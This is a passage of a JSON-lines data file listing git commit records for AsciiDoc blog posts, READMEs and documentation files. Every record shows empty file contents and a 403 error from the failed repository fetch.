2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"add86c14cc68d8e7797dd737992926b649c3070d","subject":"Update 2017-02-17-Voyage-to-the-center-of-your-Brains.adoc","message":"Update 2017-02-17-Voyage-to-the-center-of-your-Brains.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-02-17-Voyage-to-the-center-of-your-Brains.adoc","new_file":"_posts\/2017-02-17-Voyage-to-the-center-of-your-Brains.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0bd48b692635a83ea7807112498e7f3c6c868f3","subject":"Update 2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","message":"Update 2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","new_file":"_posts\/2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"070d70dd3f1760afd7ae75aa32afeb0cf4ea1515","subject":"Update 2015-07-15-DDR-A-Day-in-the-Life-at-Google.adoc","message":"Update 2015-07-15-DDR-A-Day-in-the-Life-at-Google.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-07-15-DDR-A-Day-in-the-Life-at-Google.adoc","new_file":"_posts\/2015-07-15-DDR-A-Day-in-the-Life-at-Google.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcb3a59c2052ed6bd5b78af9ef4bfa1abdbaf0aa","subject":"Update 2016-07-01-My-New-Blog.adoc","message":"Update 
2016-07-01-My-New-Blog.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-My-New-Blog.adoc","new_file":"_posts\/2016-07-01-My-New-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39acaf0a4efa90c1dbf5adbd45f0aae68bbdcf6d","subject":"Deleted _posts\/2016-12-01-hello-world.adoc","message":"Deleted _posts\/2016-12-01-hello-world.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-12-01-hello-world.adoc","new_file":"_posts\/2016-12-01-hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9909462097047a1b2aa0cf59231d9c57274dffc2","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74cc9578bfaf489e40f90d126c69884076f8fc77","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"edusantana\/asciidoc-highlight","old_file":"test\/README.asciidoc","new_file":"test\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/edusantana\/asciidoc-highlight.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75d398621576a4477f47d19d87019c9238aa847d","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfc9af9342fce6998dbd065c38ba4b4125d9ea80","subject":"Update 2017-03-24-create-pc.adoc","message":"Update 2017-03-24-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-24-create-pc.adoc","new_file":"_posts\/2017-03-24-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2234090bfe84dd0f7cb096cae041209deff34968","subject":"[DOCS] Edits the get tokens API (#45312)","message":"[DOCS] Edits the get tokens API 
(#45312)\n\n","repos":"gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch","old_file":"x-pack\/docs\/en\/rest-api\/security\/get-tokens.asciidoc","new_file":"x-pack\/docs\/en\/rest-api\/security\/get-tokens.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91316580cbfd003279eff041b309efc40fbea9e3","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34ab20c9aea5f628b87707ef690d021fb70b66f7","subject":"Update 2016-01-12-New-Year-New-Domain.adoc","message":"Update 2016-01-12-New-Year-New-Domain.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2016-01-12-New-Year-New-Domain.adoc","new_file":"_posts\/2016-01-12-New-Year-New-Domain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2855140ce603110abf4d81179149c471edd04ae2","subject":"Update version.","message":"Update version.\n","repos":"yurrriq\/cats,alesguzik\/cats,funcool\/cats,tcsavage\/cats","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"ed46921f0a9bc7619de8dfb4b6a7b80bc741fb1c","subject":"Update 2017-04-06-Week-2-Player-and-Camera-Controller.adoc","message":"Update 
2017-04-06-Week-2-Player-and-Camera-Controller.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-04-06-Week-2-Player-and-Camera-Controller.adoc","new_file":"_posts\/2017-04-06-Week-2-Player-and-Camera-Controller.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3a6257d05aee67a235249891fa1e07f82e8ac33","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf168f5f18e65bfbf04ea1d62eb965708edb2250","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18c574ad238ea77f11e4ac82cd9419f8cdfb91cb","subject":"y2b create post Ever Microwave Your Notebook?","message":"y2b create post Ever Microwave Your Notebook?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-24-Ever-Microwave-Your-Notebook.adoc","new_file":"_posts\/2016-09-24-Ever-Microwave-Your-Notebook.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a112b78d66caf71b25b8fc62e26d8b792b4fd1b2","subject":"y2b create post This Old Briefcase Showed Up...","message":"y2b create post This Old Briefcase Showed Up...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-06-This-Old-Briefcase-Showed-Up.adoc","new_file":"_posts\/2017-07-06-This-Old-Briefcase-Showed-Up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be05b1086ae9c27ca1e5bad03f28eed04ed6381b","subject":"new post","message":"new 
post\n","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/words.adoc","new_file":"content\/writings\/words.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"668c50c07cbdd167e6e1859e2b090c64da531a1c","subject":"Update 2016-01-28-Minimal-Centos-7-Image-for-RaspberryPi2.adoc","message":"Update 2016-01-28-Minimal-Centos-7-Image-for-RaspberryPi2.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2016-01-28-Minimal-Centos-7-Image-for-RaspberryPi2.adoc","new_file":"_posts\/2016-01-28-Minimal-Centos-7-Image-for-RaspberryPi2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a46f83ad2af26f638eb06a2771c5362184da6912","subject":"[SYNCOPE-700] More adds to reference guide","message":"[SYNCOPE-700] More adds to reference guide\n","repos":"apache\/syncope,nscendoni\/syncope,giacomolm\/syncope,nscendoni\/syncope,tmess567\/syncope,ilgrosso\/syncope,securny\/syncope,NuwanSameera\/syncope,nscendoni\/syncope,tmess567\/syncope,ilgrosso\/syncope,securny\/syncope,apache\/syncope,ilgrosso\/syncope,nscendoni\/syncope,giacomolm\/syncope,NuwanSameera\/syncope,giacomolm\/syncope,securny\/syncope,apache\/syncope,tmess567\/syncope,NuwanSameera\/syncope,ilgrosso\/syncope,giacomolm\/syncope,apache\/syncope,NuwanSameera\/syncope,tmess567\/syncope,securny\/syncope","old_file":"src\/main\/asciidoc\/reference-guide\/reference-guide.adoc","new_file":"src\/main\/asciidoc\/reference-guide\/reference-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NuwanSameera\/syncope.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b631b899b0fad1e02fa4b7b0ca8db2f01e264673","subject":"Update 2015-03-31-Test.adoc","message":"Update 2015-03-31-Test.adoc\n","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-03-31-Test.adoc","new_file":"_posts\/2015-03-31-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa4656266ee2514bef17501223694c17dbba10c2","subject":"Update 2015-09-08-Tips.adoc","message":"Update 2015-09-08-Tips.adoc","repos":"TeksInHelsinki\/en,TeksInHelsinki\/en,TeksInHelsinki\/en","old_file":"_posts\/2015-09-08-Tips.adoc","new_file":"_posts\/2015-09-08-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/en.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"831677c94626e31fa93020b7b649af05a48e66d5","subject":"y2b create post Samsung Galaxy Tab Unboxing (Bell Version)","message":"y2b create post Samsung Galaxy Tab Unboxing (Bell 
Version)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-04-Samsung-Galaxy-Tab-Unboxing-Bell-Version.adoc","new_file":"_posts\/2011-01-04-Samsung-Galaxy-Tab-Unboxing-Bell-Version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f164954a3e80d18e3c3b288290f1c229d31acc7","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21327bcc3bd2102d23e38b08c424c7ecc2580943","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25754157b46fdc621103675f33fae5fd7a4d698b","subject":"Update 2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","message":"Update 2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","new_file":"_posts\/2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0eebc85243cfecd996f185d05cb514c8df25c5d1","subject":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67f706d5e5e47eb945696a159198a011ecc39ad6","subject":"Update 2018-05-14-command64.adoc","message":"Update 
2018-05-14-command64.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-14-command64.adoc","new_file":"_posts\/2018-05-14-command64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cadad62bfd0ac59678d9857f4eb757431b49580f","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"Acidburn0zzz\/winreg-kb,libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Application Compatibility Cache key.asciidoc","new_file":"documentation\/Application Compatibility Cache key.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Acidburn0zzz\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8a23ce24a9d2d838db6e5bcb7ada70aac9c645dd","subject":"readme for gtest gmock","message":"readme for gtest gmock\n","repos":"ajneu\/cmake,ajneu\/cmake,ajneu\/cmake","old_file":"ex2_gtest_gmock\/README.adoc","new_file":"ex2_gtest_gmock\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ajneu\/cmake.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f78178d5dcb448cfc2a43afe1a9226578cfea1a","subject":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","message":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e9eb73a8cf7777f596e603b66e45aa4ee3319a6","subject":"Update 2016-08-08-ECC-Review.adoc","message":"Update 2016-08-08-ECC-Review.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-08-ECC-Review.adoc","new_file":"_posts\/2016-08-08-ECC-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1599327b57bb9c7b2f60511e5cf0fae69af7f13f","subject":"Update 2015-09-25-Back-to-Basic.adoc","message":"Update 2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c78f58b07ebf527d033bf2004084cd633ead6788","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 
2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7496f474a843f6bf5cc81ea9dab6039811d4db9","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twentyTwo\/twentyTwo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da8caaa4c8fc0b918566da913dee8d579a4fd77b","subject":"y2b create post New iPod Touch Unboxing (2015)","message":"y2b create post New iPod Touch Unboxing (2015)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-17-New-iPod-Touch-Unboxing-2015.adoc","new_file":"_posts\/2015-07-17-New-iPod-Touch-Unboxing-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ea9447801bd505fd115547a6e72bd0fc9daa560","subject":"y2b create post iPhone 6S Aluminum Bend Test","message":"y2b create post iPhone 6S Aluminum Bend Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-19-iPhone-6S-Aluminum-Bend-Test.adoc","new_file":"_posts\/2015-08-19-iPhone-6S-Aluminum-Bend-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8740f032345cd813781461d6814ea666583af89b","subject":"Update 2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","message":"Update 2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","new_file":"_posts\/2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c80d8bdc2a0ddc98baa465ea50dc984c144652ff","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed8a4a5fe158c100b166dbe27ca246cfab866076","subject":"add README.adoc","message":"add README.adoc\n","repos":"naipmoro\/lofmm","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/naipmoro\/lofmm.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3110ebeee8a23cda0d4cda328e27d09254e57104","subject":"Add readme","message":"Add readme\n","repos":"gentoo-ansible\/role-owncloud,jirutka\/ansible-role-owncloud","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/ansible-role-owncloud.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c941b70b752cd8d19e48b709d7265c2e9656dd7b","subject":"\u66f4\u65b0readme","message":"\u66f4\u65b0readme\n","repos":"liygheart\/jfinalbbs,liygheart\/jfinalbbs,yiiu-co\/yiiu,liygheart\/jfinalbbs,yiiu-co\/yiiu,yiiu-co\/yiiu,liygheart\/jfinalbbs,liygheart\/jfinalbbs,yiiu-co\/yiiu,liygheart\/jfinalbbs,liygheart\/jfinalbbs,yiiu-co\/yiiu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liygheart\/jfinalbbs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4b71c7335e1f0721c5cdd35864cf5b596236cb44","subject":"Updated documentation","message":"Updated documentation","repos":"resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,goldobin\/resilience4j,resilience4j\/resilience4j,RobWin\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,drmaas\/resilience4j,mehtabsinghmann\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"15965415b6d70d393767ecd53ab8f27344dc9dfc","subject":"Add docs for the java main sti image.","message":"Add docs for the java main sti 